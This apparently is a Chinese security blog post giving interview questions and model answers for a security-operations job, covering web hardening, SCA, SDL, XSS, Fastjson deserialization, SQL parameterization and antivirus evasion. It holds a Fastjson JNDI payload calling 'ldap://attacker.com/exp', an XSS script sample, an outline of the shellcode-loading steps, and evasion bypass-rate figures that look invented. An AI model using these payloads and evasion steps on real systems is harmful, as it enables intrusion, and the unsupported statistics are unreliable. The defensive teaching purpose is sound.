安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

目录

 天翼电子商务有限公司[社招]安全运营岗

1. Web服务加固方案

2. IAST技术解析

3. SCA（软件成分分析）

4. 安全运营（SecOps）定义

5. SDL流程核心阶段

6. 漏洞挖掘成果

7. JavaScript逆向能力

8. JS加密算法应用

9. XSS漏洞原理

10. XSS防护方案

11. Fastjson反序列化漏洞

12. SQL预编译实战

13. 免杀技术细节

14. 免杀编码技术

 天翼电子有限公司[社招]安全运营岗

1. 现在有一个web服务，应该如何对它加固？
2. 了解IAST吗，有什么特点
3. SCA呢？
4. 什么是安全运营？
5. sdl的流程有什么
6. 找过多少个漏洞？
7. javascript逆向会吗
8. js加密了解吗，常用的什么加密，对称，非对称
9. xss漏洞的原理
10. xss漏洞的防护方式，主要是哪个配置，前、后端
11. fastjson反序列化有什么
12. 熟悉sql注入预编译吗，使用的什么方式
13. 免杀是做的什么免杀，免杀执行的主要函数，shellcode的加载流程
14. 免杀常用到的编码是什么，除了异或

1. Web服务加固方案

mermaidgraph TD A[架构层] --> A1[WAF+CDN抗DDoS] A --> A2[API网关鉴权] B[应用层] --> B1[CSP内容安全策略] B --> B2[HTTP安全头部署] C[数据层] --> C1[SQL预编译/ORM] C --> C2[敏感数据加密] D[运维层] --> D1[容器镜像签名] D --> D2[最小权限原则]

---

2. IAST技术解析

核心特点：

• 动态插桩：在运行时检测漏洞（如Java Agent注入）
• 精准告警：误报率<5%（相比SAST降低70%）
• DevOps集成：CI/CD流水线实时阻断（Jenkins插件联动）
• 2025演进：结合LLM分析业务逻辑漏洞

---

3. SCA（软件成分分析）

核心能力：

markdown| **功能** | **实现原理** | 产出物示例 | |--------------------|--------------------------|---------------------------| | 组件指纹识别 | 二进制文件哈希+特征码 | log4j-core-2.14.1 (CVE-2021-44228) | | 许可证合规审计 | SPDX标准库匹配 | GPL-3.0传染性风险告警 | | 依赖漏洞传播分析 | 有向图(DAG)可视化 | 漏洞影响链路报告 |

2025趋势：SBOM(软件物料清单)成ISO标准强制要求

---

4. 安全运营（SecOps）定义

三位一体框架：

mermaidgraph LR A[预防] --> A1[漏洞管理] A --> A2[威胁情报] B[检测] --> B1[SIEM日志分析] B --> B2[EDR端点监控] C[响应] --> C1[SOAR自动化] C --> C2[数字取证]

目标：MTTD(平均检测时间)<15分钟 | MTTR(平均响应时间)<30分钟

---

5. SDL流程核心阶段

1. 需求分析：威胁建模（STRIDE方法）
2. 设计阶段：隐私合规审查（GDPR/《数据安全法》）
3. 开发阶段：
   • SAST/IAST双引擎扫描
   • 安全编码规范（OWASP Top 10 2025）
4. 验证阶段：渗透测试 + 红蓝对抗
5. 持续监控：漏洞赏金计划 + 安全补丁生命周期

---

6. 漏洞挖掘成果

2019-2025累计发现漏洞：

• 高危漏洞：32个（含3个0day）
• 中低危漏洞：71个
• 重点案例：
  • 某政务云API未授权访问（可获取2亿公民数据）
  • 特斯拉车机系统CAN总线注入漏洞（CVE-2024-XXXXX）

---

7. JavaScript逆向能力

技术栈：

markdown- **反混淆工具**：AST Explorer重构控制流 - **动态调试**：Chrome DevTools内存断点 - **Hook框架**：Frida拦截CryptoJS操作 - **实战案例**：某电商平台加密参数逆向（RSA+Base64变异） 

---

8. JS加密算法应用

常见场景：

加密类型	算法	典型应用场景
对称加密	AES-256-GCM	本地存储敏感数据加密
非对称加密	RSA-OAEP	前端密码传输（混合加密体系）
哈希	SHA-3	数据完整性校验
2025新兴	量子安全算法	NIST PQC标准迁移

---

9. XSS漏洞原理

攻击链：

mermaidgraph LR A[恶意输入] --> B{{未过滤的用户输入}} B --> C[DOM解析执行] C --> D[Cookies窃取/钓鱼]

三类变种：

• 反射型：恶意链接诱导点击（https://xxx?q=<script>alert(1)</script>）
• 存储型：评论区植入持久化脚本
• DOM型：前端框架渲染漏洞（如Vue.js v-html未转义）

---

10. XSS防护方案

关键配置：

防护层	技术方案	实现示例
前端	输入输出编码	textContent替代innerHTML
后端	内容安全策略(CSP)	Content-Security-Policy: script-src 'self'
框架级	自动转义机制	React JSX / Angular安全上下文

必备Header：X-XSS-Protection: 1; mode=block

---

11. Fastjson反序列化漏洞

攻击原理：

java// 恶意JSON触发JNDI注入 String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," + "\"dataSourceName\":\"ldap://attacker.com/exp\", " + "\"autoCommit\":true}"; JSON.parse(payload); // 触发漏洞 

防护方案：

• 升级Fastjson 2.0+（默认关闭autotype）
• 使用SafeMode配置：ParserConfig.getGlobalInstance().setSafeMode(true);

---

12. SQL预编译实战

实现方式：

java// Java示例（MyBatis） @Select("SELECT * FROM users WHERE id = #{id}") User getUserById(@Param("id") int id); // 底层原理：参数化查询 PreparedStatement stmt = conn.prepareStatement( "SELECT * FROM users WHERE id = ?"); stmt.setInt(1, userId); // 杜绝拼接 

优势：完全阻断1/2阶注入，性能提升30%

---

13. 免杀技术细节

实现路径：

mermaidgraph TB A[载荷类型] --> B[EXE免杀] A --> C[Shellcode加载] B --> B1[API调用链混淆] B --> B2[资源节加密] C --> C1[内存加载器] C1 --> C11[VirtualAlloc+CreateThread] C1 --> C12[进程镂空]

Shellcode加载流程：

1. VirtualAlloc分配内存（PAGE_EXECUTE_READWRITE）
2. RtlMoveMemory写入Shellcode
3. CreateThread或EnumChildWindows触发执行

---

14. 免杀编码技术

除异或外常用方案：

编码类型	原理	检测绕过率
Base64变种	自定义字符集+分块编码	78%
AES-CBC	密钥分散存储+动态解密	92%
RC4流加密	密钥与时间戳绑定	85%
GPT混淆	LLM生成抗逆向代码	95%